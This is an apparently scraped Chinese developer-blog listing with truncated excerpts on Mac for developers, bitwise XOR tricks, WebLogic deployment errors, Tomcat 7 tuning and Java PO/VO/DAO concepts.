Mac 在国外很受欢迎，尤其是在设计/web开发/IT 人员圈子里。普通用户喜欢 Mac 可以理解，毕竟 Mac 设计美观，简单好用，没有病毒。那么为什么专业人士也对 Mac 情有独钟呢？从个人使用经验来看我想有下面几个原因： 1、Mac OS X 是基于 Unix 的这一点太重要了，尤其是对开发人员，至少对于我来说很重要，这意味着Unix 下一堆好用的工具都可以随手捡到。如果你是个 wi
位运算、异或的实际应用 wenjinglian 位运算
一．位操作基础，用一张表描述位操作符的应用规则并详细解释。二．常用位操作小技巧，有判断奇偶、交换两数、变换符号、求绝对值。三．位操作与空间压缩，针对筛素数进行空间压缩。 &n
weblogic部署项目出现的一些问题（持续补充中……） Everyday都不同 weblogic部署失败
好吧，weblogic的问题确实…… 问题一： org.springframework.beans.factory.BeanDefinitionStoreException: Failed to read candidate component class: URL [zip:E:/weblogic/user_projects/domains/base_domain/serve
tomcat7性能调优（01） toknowme tomcat7
Tomcat优化： 1、最大连接数最大线程等设置 <Connector port="8082" protocol="HTTP/1.1" useBodyEncodingForURI="t
PO VO DAO DTO BO TO概念与区别 xp9802 java DAO 设计模式 bean 领域模型
O/R Mapping 是 Object Relational Mapping（对象关系映射）的缩写。通俗点讲，就是将对象与关系数据库绑定，用对象来表示关系数据。在O/R Mapping的世界里，有两个基本的也是重要的东东需要了解，即VO，PO。它们的关系应该是相互独立的，一个VO可以只是PO的部分，也可以是多个PO构成，同样也可以等同于一个PO（指的是他们的属性）。这样，PO独立出来，数据持